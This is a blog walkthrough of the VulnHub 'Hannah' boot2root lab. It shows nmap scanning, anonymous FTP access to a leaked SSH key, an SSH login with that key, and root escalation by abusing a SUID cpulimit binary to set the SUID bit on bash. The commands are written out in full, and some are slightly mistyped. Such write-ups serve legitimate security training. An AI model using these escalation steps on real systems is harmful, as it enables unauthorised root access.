Today we will solve a new boot2root challenge named "ONSYSTEM: SHELLDREDD # 1 HANNAH". For penetration testing, it is available on VulnHub and we can download it from here. The credit goes to d4t4s3c for creating this lab. Let's start, and learn how to break it down successfully.
Level: Easy
Penetration Testing Methodology
·
Network Scanning
o
netdiscover
o
nmap
·
Enumeration
o
ftp login
·
Exploiting
o
SSH
·
Post Exploitation
o
Enumeration for Sudo
Permission
o
Enumeration for SUID
·
Privilege Escalation
o
SUID
permission on cpulimit
Now Let’s start this walkthrough
Network Scanning
Using netdiscover we
start by scanning our network for the target computer to find the IP Address of
the Target Machine. We need to match the MAC Address of the Target Machine with
the IP Addresses that were shown by the netdiscover command. On 192.168.0.121
the target machine was active.
netdiscover
Let's
do a port or a services scan. We will be using the nmap tool to see which ports
are available. As we have seen in the FTP (21) and SSH (61000) services are
available in the screenshot below.
nmap -p- -A 192.168.0.121
Enumeration
It was quite clear from the nmap scan that
the FTP service has Anonymous Login Enabled by default. So, let’s login as
Anonymous to further enumerate the service.
ftp 192.168.0.121
Anonymous
We listed the contents
of the directory using the ls command but it was worthless. After this, it came
to us that the directories might be hidden. So, now it’s time to use the la
option in ls command to list all the files inside the current working directory.
Then we found out a hidden directory called (.hannah) in this directory we can find out an SSH key.
ls
ls-la
cd .hannah
ls-la
We use the get command
to transfer this key in our local system aka Kali Linux.
get id_rsa
Exploiting
Now as we downloaded
the SSH key from the FTP server, it might have improper permissions. The SSH
key requires a specific set of permissions. The key must have the read and
write permission on the User or Owner. That means we need to add 600
permission. After setting appropriate permission, it’s time to login using the
SSH key. If we remember correctly from
the nmap scan, the SSH service is running on the port 61000.
chmod 600 id_rsa
ssh -i id_rsa hannah@192.168.0.121 -p 61000
We get access to the
Hannah user.
Post Exploitation
Now that we have a
session on the target machine, its time to enumerate. We list all the files in
the directory and find a file named user.txt. This might be the user flag.
ls
cat user.txt
Now that the user flag
is found, its time to elevate privileges and look for the binaries that can be
run as sudo.
sudo -l
Much to our demise,
there isn’t any binary or script that can be run as sudo.
Next on our docket is
SUID permissions. We can enumerate
all binaries having SUID permissions with the help of the find command as shown
in the image below.
find / -perm -u=5 -type f 2>/dev/null
We find that there is
a binary called cpulimit that have the SUID permissions. Time to exploit it.
Privilege Escalation
We can use this
cpulimit to run commands which we don’t have permissions to run like mkdir, cp,
etc. but to use we need to move in /tmp
directory as it is the only directory which has write permissions. Next, we
change the permission for the bash file and copy its contents to the directory
we created i.e., ignite. Then we apply the execution permissions to the bash
inside the ignite directory.
cd /tmp
cpulimit -l 100 -f mkdir /ignite
cpulimit -l 100 -f chmod 4755 /usr/bin/bash
cpulimit -l 100 -f cp /usr/bin/bash /ignite
cpulimit -l 100 -f chmod +s /ignite/bash
./bash -p
Then BOOM!! we got the
root we can check its id and in the
root directory we found out its root.txt.
After executing this file, Hurray!! we got our root flag.
cd /root
ls
cat root.txt
Author: Shubham Sharma is a Pentester and
Cybersecurity Researcher, Contact LinkedIn,
and Twitter.
0 comments:
Post a Comment